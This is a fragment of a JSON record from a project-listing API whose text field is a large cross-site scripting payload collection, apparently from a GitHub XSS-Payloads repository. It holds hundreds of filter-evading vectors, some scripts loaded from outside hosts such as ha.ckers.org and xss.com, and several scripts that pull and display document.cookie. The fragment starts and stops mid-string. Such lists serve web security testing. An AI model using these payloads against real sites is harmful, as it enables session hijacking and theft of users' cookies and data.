BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cTABLE\u003e\u003cTD BACKGROUND=\"javascript:alert('XSS')\"\u003e\n\u003cDIV STYLE=\"background-image: url(javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\u003e\n\u003cDIV STYLE=\"background-image: url(\u0026#1;javascript:alert('XSS'))\"\u003e\n\u003cDIV STYLE=\"width: expression(alert('XSS'));\"\u003e\n\u003cSTYLE\u003e@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';\u003c/STYLE\u003e\n\u003cIMG STYLE=\"xss:expr/*XSS*ession(alert('XSS'))\"\u003e\n\u003cXSS STYLE=\"xss:expression(alert('XSS'))\"\u003e\nexp/*\u003cA STYLE='no\\xss:noxss(\"**\");\nxss:\u0026#101;x\u0026#x2F;*XSS*//**pression(alert(\"XSS\"))'\u003e\n\u003cSTYLE TYPE=\"text/javascript\"\u003ealert('XSS');\u003c/STYLE\u003e\n\u003cSTYLE\u003e.XSS{background-image:url(\"javascript:alert('XSS')\");}\u003c/STYLE\u003e\u003cA CLASS=XSS\u003e\u003c/A\u003e\n\u003cSTYLE type=\"text/css\"\u003eBODY{background:url(\"javascript:alert('XSS')\")}\u003c/STYLE\u003e\n\u003c!--[if gte IE 4]\u003e\n\u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n\u003c![endif]--\u003e\n\u003cBASE HREF=\"javascript:alert('XSS');//\"\u003e\n\u003cOBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"\u003e\u003c/OBJECT\u003e\n\u003cOBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389\u003e\u003cparam name=url value=javascript:alert('XSS')\u003e\u003c/OBJECT\u003e\n\u003cEMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"\u003e\u003c/EMBED\u003e\n\u003cHTML xmlns:xss\u003e\n\u003c?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"\u003e\n\u003cxss:xss\u003eXSS\u003c/xss:xss\u003e\n\u003c/HTML\u003e\n\u003cXML ID=I\u003e\u003cX\u003e\u003cC\u003e\u003c![CDATA[\u003cIMG SRC=\"javas]]\u003e\u003c![CDATA[cript:alert('XSS');\"\u003e]]\u003e\n\u003c/C\u003e\u003c/X\u003e\u003c/xml\u003e\u003cSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u003e\u003c/SPAN\u003e\n\u003cXML ID=\"xss\"\u003e\u003cI\u003e\u003cB\u003e\u0026lt;IMG SRC=\"javas\u003c!-- --\u003ecript:alert('XSS')\"\u0026gt;\u003c/B\u003e\u003c/I\u003e\u003c/XML\u003e\n\u003cSPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"\u003e\u003c/SPAN\u003e\n\u003cXML SRC=\"xsstest.xml\" ID=I\u003e\u003c/XML\u003e\n\u003cSPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML\u003e\u003c/SPAN\u003e\n\u003cHTML\u003e\u003cBODY\u003e\n\u003c?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"\u003e\n\u003c?import namespace=\"t\" implementation=\"#default#time2\"\u003e\n\u003ct:set attributeName=\"innerHTML\" to=\"XSS\u0026lt;SCRIPT DEFER\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/SCRIPT\u0026gt;\"\u003e\n\u003c/BODY\u003e\u003c/HTML\u003e\n\u003cSCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"\u003e\u003c/SCRIPT\u003e\n\u003cMETA HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=\u0026lt;SCRIPT\u0026gt;alert('XSS')\u0026lt;/SCRIPT\u0026gt;\"\u003e\n\u003cHEAD\u003e\u003cMETA HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"\u003e \u003c/HEAD\u003e\u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT =\"\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e\" '' SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT \"a='\u003e'\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=`\u003e` SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT a=\"\u003e'\u003e\" SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cSCRIPT\u003edocument.write(\"\u003cSCRI\");\u003c/SCRIPT\u003ePT SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cA HREF=\"http://66.102.7.147/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://1113982867/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://0x42.0x0000066.0x7.0x93/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://0102.0146.0007.00000223/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"h\ntt\tp://6\u0026#9;6.000146.0x7.147/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"//www.google.com/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"//google\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://ha.ckers.org@google\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://google:ha.ckers.org\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://google.com/\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://www.google.com./\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"javascript:document.location='http://www.google.com/'\"\u003eXSS\u003c/A\u003e\n\u003cA HREF=\"http://www.gohttp://www.google.com/ogle.com/\"\u003eXSS\u003c/A\u003e\n\n▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉\n100 #XSS Vectors by @soaj1664ashar\n\n\u003ciframe %00 src=\"\u0026Tab;javascript:prompt(1)\u0026Tab;\"%00\u003e\n\n\u003csvg\u003e\u003cstyle\u003e{font-family\u0026colon;'\u003ciframe/onload=confirm(1)\u003e'\n\n\u003cinput/onmouseover=\"javaSCRIPT\u0026colon;confirm\u0026lpar;1\u0026rpar;\"\n\n\u003csVg\u003e\u003cscRipt %00\u003ealert\u0026lpar;1\u0026rpar; {Opera}\n\n\u003cimg/src=`%00` onerror=this.onerror=confirm\n\n\u003cform\u003e\u003cisindex formaction=\"javascript\u0026colon;confirm(1)\"\n\n\u003cimg src=`%00`\u0026NewLine; onerror=alert(1)\u0026NewLine;\n\n\u003cscript/\u0026Tab; src='https://dl.dropbox.com/u/13018058/js.js' /\u0026Tab;\u003e\u003c/script\u003e\n\n\u003cScRipT 5-0*3?=\u003eprompt(1)\u003c/ScRipT giveanswerhere=?\n\n\u003ciframe/src=\"data:text/html;\u0026Tab;base64\u0026Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\"\u003e\n\n\u003cscript /*%00*/\u003e/*%00*/alert(1)/*%00*/\u003c/script /*%00*/\n\n\u0026#34;\u0026#62;\u003ch1/onmouseover='\\u0061lert(1)'\u003e%00\n\n\u003ciframe/src=\"data:text/html,\u003csvg \u0026#111;\u0026#110;load=alert(1)\u003e\"\u003e\n\n\u003cmeta content=\"\u0026NewLine; 1 \u0026NewLine;; JAVASCRIPT\u0026colon; alert(1)\" http-equiv=\"refresh\"/\u003e\n\n\u003csvg\u003e\u003cscript xlink:href=data\u0026colon;,window.open('https://www.google.com/')\u003e\u003c/script\n\n\u003csvg\u003e\u003cscript x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n\n\u003cmeta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\"\u003e\n\n\u003ciframe src=javascript\u0026colon;alert\u0026lpar;document\u0026period;location\u0026rpar;\u003e\n\n\u003cform\u003e\u003ca href=\"javascript:\\u0061lert\u0026#x28;1\u0026#x29;\"\u003eX\n\n\u003c/script\u003e\u003cimg/*%00/src=\"worksinchrome\u0026colon;prompt\u0026#x28;1\u0026#x29;\"/%00*/onerror='eval(src)'\u003e\n\n\u003cimg/\u0026#09;\u0026#10;\u0026#11; src=`~` onerror=prompt(1)\u003e\n\n\u003cform\u003e\u003ciframe \u0026#09;\u0026#10;\u0026#11; src=\"javascript\u0026#58;alert(1)\"\u0026#11;\u0026#10;\u0026#09;;\u003e\n\n\u003ca href=\"data:application/x-x509-user-cert;\u0026NewLine;base64\u0026NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"\u0026#09;\u0026#10;\u0026#11;\u003eX\u003c/a\n\nhttp://www.google\u003cscript .com\u003ealert(document.location)\u003c/script\n\n\u003ca\u0026#32;href\u0026#61;\u0026#91;\u0026#00;\u0026#93;\"\u0026#00; onmouseover=prompt\u0026#40;1\u0026#41;\u0026#47;\u0026#47;\"\u003eXYZ\u003c/a\n\n\u003cimg/src=@\u0026#32;\u0026#13; onerror = prompt('\u0026#49;')\n\n\u003cstyle/onload=prompt\u0026#40;'\u0026#88;\u0026#83;\u0026#83;'\u0026#41;\n\n\u003cscript ^__^\u003ealert(String.fromCharCode(49))\u003c/script ^__^\n\n\u003c/style \u0026#32;\u003e\u003cscript \u0026#32; :-(\u003e/**/alert(document.location)/**/\u003c/script \u0026#32; :-(\n\n\u0026#00;\u003c/form\u003e\u003cinput type\u0026#61;\"date\" onfocus=\"alert(1)\"\u003e\n\n\u003cform\u003e\u003ctextarea \u0026#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074\u0026#x28;1\u0026#x29;'\u003e\n\n\u003cscript /***/\u003e/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/\u003c/script /***/\n\n\u003ciframe srcdoc='\u0026lt;body onload=prompt\u0026lpar;1\u0026rpar;\u0026gt;'\u003e\n\n\u003ca href=\"javascript:void(0)\" onmouseover=\u0026NewLine;javascript:alert(1)\u0026NewLine;\u003eX\u003c/a\u003e\n\n\u003cscript ~~~\u003ealert(0%0)\u003c/script ~~~\u003e\n\n\u003cstyle/onload=\u0026lt;!--\u0026#09;\u0026gt;\u0026#10;alert\u0026#10;\u0026lpar;1\u0026rpar;\u003e\n\n\u003c///style///\u003e\u003cspan %2F onmousemove='alert\u0026lpar;1\u0026rpar;'\u003eSPAN\n\n\u003cimg/src='http://i.imgur.com/P8mL8.jpg' onmouseover=\u0026Tab;prompt(1)\n\n\u0026#34;\u0026#62;\u003csvg\u003e\u003cstyle\u003e{-o-link-source\u0026colon;'\u003cbody/onload=confirm(1)\u003e'\n\n\u0026#13;\u003cblink/\u0026#13; onmouseover=pr\u0026#x6F;mp\u0026#116;(1)\u003eOnMouseOver {Firefox \u0026 Opera}\n\n\u003cmarquee onstart='javascript:alert\u0026#x28;1\u0026#x29;'\u003e^__^\n\n\u003cdiv/style=\"width:expression(confirm(1))\"\u003eX\u003c/div\u003e {IE7}\n\n\u003ciframe/%00/ src=javaSCRIPT\u0026colon;alert(1)\n\n//\u003cform/action=javascript\u0026#x3A;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003e\u003cinput/type='submit'\u003e//\n\n/*iframe/src*/\u003ciframe/src=\"\u003ciframe/src=@\"/onload=prompt/*iframe/src*/\u003e\n\n//|\\\\ \u003cscript //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'\u003e //|\\\\ \u003c/script //|\\\\\n\n\u003c/font\u003e/\u003csvg\u003e\u003cstyle\u003e{src\u0026#x3A;'\u003cstyle/onload=this.onload=confirm(1)\u003e'\u003c/font\u003e/\u003c/style\u003e\n\n\u003ca/href=\"javascript:\u0026#13; javascript:prompt(1)\"\u003e\u003cinput type=\"X\"\u003e\n\n\u003c/plaintext\\\u003e\u003c/|\\\u003e\u003cplaintext/onmouseover=prompt(1)\n\n\u003c/svg\u003e''\u003csvg\u003e\u003cscript 'AQuickBrownFoxJumpsOverTheLazyDog'\u003ealert\u0026#x28;1\u0026#x29; {Opera}\n\n\u003ca href=\"javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t\u0026lpar;1\u0026rpar;\"\u003e\u003cbutton\u003e\n \n\u003cdiv onmouseover='alert\u0026lpar;1\u0026rpar;'\u003eDIV\u003c/div\u003e\n \n\u003ciframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\"\u003e\n \n\u003ca href=\"jAvAsCrIpT\u0026colon;alert\u0026lpar;1\u0026rpar;\"\u003eX\u003c/a\u003e\n \n\u003cembed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n \n\u003cobject data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"\u003e\n \n\u003cvar onmouseover=\"prompt(1)\"\u003eOn Mouse Over\u003c/var\u003e\n \n\u003ca href=javascript\u0026colon;alert\u0026lpar;document\u0026period;cookie\u0026rpar;\u003eClick Here\u003c/a\u003e\n \n\u003cimg src=\"/\" =_=\" title=\"onerror='prompt(1)'\"\u003e\n \n\u003c%\u003c!--'%\u003e\u003cscript\u003ealert(1);\u003c/script --\u003e\n \n\u003cscript src=\"data:text/javascript,alert(1)\"\u003e\u003c/script\u003e\n \n\u003ciframe/src \\/\\/onload = prompt(1)\n \n\u003ciframe/onreadystatechange=alert(1)\n \n\u003csvg/onload=alert(1)\n \n\u003cinput value=\u003c\u003e\u003ciframe/src=javascript:confirm(1)\n \n\u003cinput type=\"text\" value=`` \u003cdiv/onmouseover='alert(1)'\u003eX\u003c/div\u003e\n \nhttp://www.\u003cscript\u003ealert(1)\u003c/script .com\n \n\u003ciframe src=j\u0026NewLine;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;v\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;s\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;c\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;i\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;p\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026colon;a\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;l\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;e\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;r\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;t\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;28\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;1\u0026NewLine;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;\u0026Tab;%29\u003e\u003c/iframe\u003e\n \n\u003csvg\u003e\u003cscript ?\u003ealert(1)\n \n\u003ciframe src=j\u0026Tab;a\u0026Tab;v\u0026Tab;a\u0026Tab;s\u0026Tab;c\u0026Tab;r\u0026Tab;i\u0026Tab;p\u0026Tab;t\u0026Tab;:a\u0026Tab;l\u0026Tab;e\u0026Tab;r\u0026Tab;t\u0026Tab;%28\u0026Tab;1\u0026Tab;%29\u003e\u003c/iframe\u003e\n \n\u003cimg src=`xx:xx`onerror=alert(1)\u003e\n \n\u003cobject type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"\u003e\u003c/object\u003e\n \n\u003cmeta http-equiv=\"refresh\" content=\"0;javascript\u0026colon;alert(1)\"/\u003e\n \n\u003cmath\u003e\u003ca xlink:href=\"//jsfiddle.net/t846h/\"\u003eclick\n \n\u003cembed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always\u003e\n \n\u003csvg contentScriptType=text/vbs\u003e\u003cscript\u003eMsgBox\n \n\u003ca href=\"data:text/html;base64_,\u003csvg/onload=\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\"\u003eX\u003c/a\n \n\u003ciframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u006worksinIE\u003e\n \n\u003cscript\u003e~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')\u003c/script U\n \n\u003cscript/src=\"data\u0026colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"\u003e\u003c/script a=\\u0061 \u0026 /=%2F\n \n\u003cscript/src=data\u0026colon;text/j\\u0061v\\u0061\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116,\\u0061%6C%65%72%74(/XSS/)\u003e\u003c/script\n \n\u003cobject data=javascript\u0026colon;\\u0061\u0026#x6C;\u0026#101%72t(1)\u003e\n \n\u003cscript\u003e++1-+?(1)\u003c/script\u003e\n \n\u003cbody/onload=\u0026lt;!--\u0026gt;\u0026#10alert(1)\u003e\n \n\u003cscript itworksinallbrowsers\u003e/*\u003cscript* */alert(1)\u003c/script\n \n\u003cimg src ?itworksonchrome?\\/onerror = alert(1)\n \n\u003csvg\u003e\u003cscript\u003e//\u0026NewLine;confirm(1);\u003c/script \u003c/svg\u003e\n \n\u003csvg\u003e\u003cscript onlypossibleinopera:-)\u003e alert(1)\n \n\u003ca aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j\u0026#97v\u0026#97script\u0026#x3A;\u0026#97lert(1)\u003eClickMe\n \n\u003cscript x\u003e alert\u003c/script 1=2\n \n\u003cdiv/onmouseover='alert(1)'\u003e style=\"x:\"\u003e\n \n \u003c--`\u003cimg/src=` onerror=alert(1)\u003e --!\u003e\n \n\u003cscript/src=\u0026#100\u0026#97\u0026#116\u0026#97:text/\u0026#x6a\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x000070\u0026#x074,\u0026#x0061;\u0026#x06c;\u0026#x0065;\u0026#x00000072;\u0026#x00074;(1)\u003e\u003c/script\u003e\n \n\u003cdiv style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\"\u003ex\u003c/button\u003e\n \n\"\u003e\u003cimg src=x onerror=window.open('https://www.google.com/');\u003e\n \n\u003cform\u003e\u003cbutton formaction=javascript\u0026colon;alert(1)\u003eCLICKME\n \n\u003cmath\u003e\u003ca xlink:href=\"//jsfiddle.net/t846h/\"\u003eclick\n \n\u003cobject data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik\u003e\u003c/object\u003e\n \n\u003ciframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"\u003e\u003c/iframe\u003e\n \n1\u003ca href=\"data:text/html;blabla,\u0026#60\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#32\u0026#115\u0026#114\u0026#99\u0026#61\u0026#34\u0026#104\u0026#116\u0026#116\u0026#112\u0026#58\u0026#47\u0026#47\u0026#115\u0026#116\u0026#101\u0026#114\u0026#110\u0026#101\u0026#102\u0026#97\u0026#109\u0026#105\u0026#108\u0026#121\u0026#46\u0026#110\u0026#101\u0026#116\u0026#47\u0026#102\u0026#111\u0026#111\u0026#46\u0026#106\u0026#115\u0026#34\u0026#62\u0026#60\u0026#47\u0026#115\u0026#99\u0026#114\u0026#105\u0026#112\u0026#116\u0026#62\u0026#8203\"\u003eClick Me\u003c/a\u003e\n\n▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉\nAND EVEN MORE:\n\n'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E\n\u003c\u003cscr\\0ipt/src=http://xss.com/xss.js\u003e\u003c/script\n%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E\n' onmouseover=alert(/Black.Spook/)\n\"\u003e\u003ciframe%20src=\"http://google.com\"%%203E\n'\u003cscript\u003ewindow.onload=function(){document.forms[0].message.value='1';}\u003c/script\u003e\nx”\u003c/title\u003e\u003cimg src%3dx onerror%3dalert(1)\u003e\n\u003cscript\u003e document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); \u003c/script\u003e\n\u003cscript\u003eObject.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())\u003c/script\u003e\n\u003cscript\u003evar x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();\u003c/script\u003e\n\u003cscript\u003e(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();\u003c/script\u003e\n\u003cscript\u003evar script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])\u003c/script\u003e\n\u003cscript\u003exhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();\u003c/script\u003e\n\u003cscript\u003ealert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])\u003c/script\u003e\n\u003cscript\u003ealert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])\u003c/script\u003e\n\u003c%73%63%72%69%70%74\u003e %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); \u003c/%73%63%72%69%70%74\u003e\n\u003cscript\u003e var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); \u003c/script\u003e\n\u003ciframe id=%22ifra%22 src=%22/%22\u003e\u003c/iframe\u003e \u003cscript\u003eifr = document.getElementById('ifra'); ifr.contentDocument.write(%22\u003cscr%22 %2b %22ipt\u003etop.foo = Object.defineProperty\u003c/scr%22 %2b %22ipt\u003e%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());\u003c/script\u003e\n\u003cscript\u003ealert(document.head.innerHTML.substr(146,20));\u003c/script\u003e\n\u003cscript\u003ealert(document.head.childNodes[3].text)\u003c/script\u003e\n\u003cscript\u003evar request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}\u003c/script\u003e\n\u003cscript\u003eObject.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())\u003c/script\u003e\n\u003cscript\u003ex=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22\u003cscript\u003er=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}\u003c\\/script\u003e%22)};document.body.appendChild(x);\u003c/script\u003e\n\u003cscript\u003ex=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22\u003cscript\u003eObject.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())\u003c\\/script\u003e%22)};document.body.appendChild(x);\u003c/script\u003e\n\u003cscript\u003e var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; \u003c/script\u003e\n\u003cscript\u003e document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); \u003c/script\u003e\n\u003cscript\u003e var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); \u003c/script\u003e\n\u003cscript\u003e (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); \u003c/script\u003e\n\u003ciframe src=/ onload=eval(unescape(this.name.replace(/\\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528ff","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fihebski%2FXSS-Payloads","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fihebski%2FXSS-Payloads","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fihebski%2FXSS-Payloads/lists"}